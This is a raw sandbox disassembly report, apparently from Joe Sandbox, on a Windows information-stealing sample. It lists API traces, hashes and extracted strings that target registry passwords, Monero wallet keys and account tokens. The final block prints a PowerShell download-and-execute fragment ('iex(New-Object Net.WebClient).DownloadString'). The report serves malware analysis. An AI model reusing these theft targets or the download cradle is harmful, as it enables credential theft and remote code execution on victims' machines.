                                  • Instruction Fuzzy Hash: CC311CB1A00109EBCB04EBB4DD99FFF7779BB54301F14C618F106A72A1DA35A946CB52
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                  • InternetOpenA.WININET(00A90DF7,00000001,00000000,00000000,00000000), ref: 00A7610F
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A7618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A761B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00A761DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A7620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00A76249
                                  • InternetCloseHandle.WININET(?), ref: 00A76253
                                  • InternetCloseHandle.WININET(00000000), ref: 00A76260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 72ab4e8563375b1f8602eb890e2f37a7b90b9fac3e73c3650892d128f75e43f9
                                  • Instruction ID: 7c9ec8bae6fbfe7ee12e51b1d64be05e6cda825cf27c16e80942a7ac56bc6ba7
                                  • Opcode Fuzzy Hash: 72ab4e8563375b1f8602eb890e2f37a7b90b9fac3e73c3650892d128f75e43f9
                                  • Instruction Fuzzy Hash: 135160B1A00618ABEB20DF60DD49BEE77B8EB44701F10C198B609B71C1DB746A89CF95
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A7733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A773B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A7740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00A77452
                                  • HeapFree.KERNEL32(00000000), ref: 00A77459
                                  • task.LIBCPMTD ref: 00A77555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0d65ab8f54ce67e9cde47365f7bbc94e58cfb311acf373bdbd56bad599bb7ed5
                                  • Instruction ID: 7fa057db4cdab60d53cb400a1a861a34859693ed82bfa2e90a6ac8c15c732373
                                  • Opcode Fuzzy Hash: 0d65ab8f54ce67e9cde47365f7bbc94e58cfb311acf373bdbd56bad599bb7ed5
                                  • Instruction Fuzzy Hash: D16119B59441689BDB24DB50CD45BDEB7B8BF48300F00C1E9E68DA6141EBB46BC9CFA1
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0068D980,00000000,00020119,?), ref: 00A840F4
                                  • RegQueryValueExA.ADVAPI32(?,0068E958,00000000,00000000,00000000,000000FF), ref: 00A84118
                                  • RegCloseKey.ADVAPI32(?), ref: 00A84122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84147
                                  • lstrcat.KERNEL32(?,0068E9A0), ref: 00A8415B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID: Xh$h
                                  • API String ID: 690832082-4013920764
                                  • Opcode ID: 8e5724b9a3a92b3b70c74f404faadb26d5ed79c7ab0d9c22129ea352ac97bce1
                                  • Instruction ID: 9fc0f71aadc5f80108fc8e163d493737372d1cc429cd58e1a96039e09c321fb2
                                  • Opcode Fuzzy Hash: 8e5724b9a3a92b3b70c74f404faadb26d5ed79c7ab0d9c22129ea352ac97bce1
                                  • Instruction Fuzzy Hash: 8441ABB7D00108ABDB14FBA0DD46FFE737DAB98300F408658B65957181EE755B888BD2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0068EEB0,00000000,?,00A90E2C,00000000,?,00000000), ref: 00A88130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A88158
                                  • wsprintfA.USER32 ref: 00A881AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@$ph
                                  • API String ID: 2922868504-2567548595
                                  • Opcode ID: 5ba146414facbb0781a302b9753f325e5992c21733d2885cb381edfd937d538d
                                  • Instruction ID: 5b575b7155494887bd417db0d68d1f7f0b8f576cdcda3d8e3c6b759711e11496
                                  • Opcode Fuzzy Hash: 5ba146414facbb0781a302b9753f325e5992c21733d2885cb381edfd937d538d
                                  • Instruction Fuzzy Hash: 85212EB1E44218ABDB04DFD4CD49FAEB7B8FB44B50F104609F605BB2C0DB7959018BA5
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BC9F
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A7BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00A7BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 359e9226f4986e792b2540028f318bb7599d138a4f4a1984cd2e7b33d6bfd71e
                                  • Instruction ID: 471ba249c29f816b4fa7e347670991f3f7306cdf11952b8312e9b7e870874bc3
                                  • Opcode Fuzzy Hash: 359e9226f4986e792b2540028f318bb7599d138a4f4a1984cd2e7b33d6bfd71e
                                  • Instruction Fuzzy Hash: AFB10471D10118ABEF14FBA0DE96EEE7378AF64300F404559F506B6191EF386A49CB72
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: f1dba84060a38136ae16f157be4da283c58ed4b18fb2a0d70b23b6a6b13a4895
                                  • Instruction ID: af32eda9b01d1a9f8ca9f316a60cf5c96710c9eaef20048a25089b245a079fb4
                                  • Opcode Fuzzy Hash: f1dba84060a38136ae16f157be4da283c58ed4b18fb2a0d70b23b6a6b13a4895
                                  • Instruction Fuzzy Hash: F9F05E30908249FFEB44AFE0E90972C7B70FB08703F040298F68996290DA724B41DBD6
                                  APIs
                                  • lstrcat.KERNEL32(?,0068EA78), ref: 00A847DB
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84801
                                  • lstrcat.KERNEL32(?,?), ref: 00A84820
                                  • lstrcat.KERNEL32(?,?), ref: 00A84834
                                  • lstrcat.KERNEL32(?,0067A5F0), ref: 00A84847
                                  • lstrcat.KERNEL32(?,?), ref: 00A8485B
                                  • lstrcat.KERNEL32(?,0068DB60), ref: 00A8486F
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88D90: GetFileAttributesA.KERNEL32(00000000,?,00A71B54,?,?,00A9564C,?,?,00A90E1F), ref: 00A88D9F
                                    • Part of subcall function 00A84570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A84580
                                    • Part of subcall function 00A84570: RtlAllocateHeap.NTDLL(00000000), ref: 00A84587
                                    • Part of subcall function 00A84570: wsprintfA.USER32 ref: 00A845A6
                                    • Part of subcall function 00A84570: FindFirstFileA.KERNEL32(?,?), ref: 00A845BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID: xh
                                  • API String ID: 2540262943-1570541007
                                  • Opcode ID: 6931e55c6e9ceaa7edd183a66206b6cf066d81461d28c3b0d33c7987bacf650f
                                  • Instruction ID: af309eeab82a118091180a235d6bbe6947a5e42a67875a37a90fa8169555be44
                                  • Opcode Fuzzy Hash: 6931e55c6e9ceaa7edd183a66206b6cf066d81461d28c3b0d33c7987bacf650f
                                  • Instruction Fuzzy Hash: 563152B2900218A7CB14FBB0DD85FED737CBB58700F404599F35996091EE749789CB96
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A74FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A74FD1
                                  • InternetOpenA.WININET(00A90DDF,00000000,00000000,00000000,00000000), ref: 00A74FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A75011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A75041
                                  • InternetCloseHandle.WININET(?), ref: 00A750B9
                                  • InternetCloseHandle.WININET(?), ref: 00A750C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 14e211366479b25bf7aa43caba5b19b92baf17f141e3617b4edf2095103e0d2b
                                  • Instruction ID: 3ade97bc957d60414a871278cc91e9ca2be8df9538ae38ee8f74acbd8bd42cfd
                                  • Opcode Fuzzy Hash: 14e211366479b25bf7aa43caba5b19b92baf17f141e3617b4edf2095103e0d2b
                                  • Instruction Fuzzy Hash: 2B31F8B4A40218ABDB20CF64DD85BDDB7B4FB48704F1081D9E609A7281DBB06EC58F99
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A88426
                                  • wsprintfA.USER32 ref: 00A88459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A8847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88499
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EE68,00000000,000F003F,?,00000400), ref: 00A884EC
                                  • lstrlen.KERNEL32(?), ref: 00A88501
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EF28,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A90B34), ref: 00A88599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 65c364a5a266ddbeed14baf307567549416e603c40a49b54b7dd9d2289447557
                                  • Instruction ID: f8808d0b14432e0b83b21d8ba1d6b718ef5de10a82f225ada4b417de64aab6e3
                                  • Opcode Fuzzy Hash: 65c364a5a266ddbeed14baf307567549416e603c40a49b54b7dd9d2289447557
                                  • Instruction Fuzzy Hash: 4921EB71910218AFDB24DB54DC85FE9B3B8FB48700F40C5D9E649A6180DF756A85CFD4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A876A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A876AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBB0,00000000,00020119,00000000), ref: 00A876DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EFB8,00000000,00000000,?,000000FF), ref: 00A876FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A87708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 788062a3d18a274a532bfaf1eee1e3cd90bfdbacae3b7b2d555407b8ee65b68e
                                  • Instruction ID: d1808afa7084983e24e66fd96486c97e4b63c21d013af17b03d82034f6a759f9
                                  • Opcode Fuzzy Hash: 788062a3d18a274a532bfaf1eee1e3cd90bfdbacae3b7b2d555407b8ee65b68e
                                  • Instruction Fuzzy Hash: A0016DB5A04308BFEB00EBE4DD49FAEB7B8EB48701F104694FA45E7291EA719900CB51
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A8773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBB0,00000000,00020119,00A876B9), ref: 00A8775B
                                  • RegQueryValueExA.ADVAPI32(00A876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A8777A
                                  • RegCloseKey.ADVAPI32(00A876B9), ref: 00A87784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: f91eaab309f3bf5fca5e6de95c3d1ee666fa91ec22c20b421613f3bb63518a97
                                  • Instruction ID: 7722c4ef62458a508b50040e58bfe4f533234ccd8473b8c0f7e53fdb55187591
                                  • Opcode Fuzzy Hash: f91eaab309f3bf5fca5e6de95c3d1ee666fa91ec22c20b421613f3bb63518a97
                                  • Instruction Fuzzy Hash: 830117B5A40308BFDB00DBE4DC49FAEB7B8EB44705F104555FA45A7291DA759900CB91
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                  • LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: fc2c31070f0153c8975251e535d120853064c7e0b3a9e29e22f3ac5d373e82f6
                                  • Instruction ID: 9a3088d0f97e5a2aee19dca482f4660c792e168d815a17bff7796672869a3af3
                                  • Opcode Fuzzy Hash: fc2c31070f0153c8975251e535d120853064c7e0b3a9e29e22f3ac5d373e82f6
                                  • Instruction Fuzzy Hash: 4F3129B4A00209EFDB14CFA4CD85BAF77B5FF48351F108159E905A7290D779AA42CFA1
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A82D85
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A82CC4
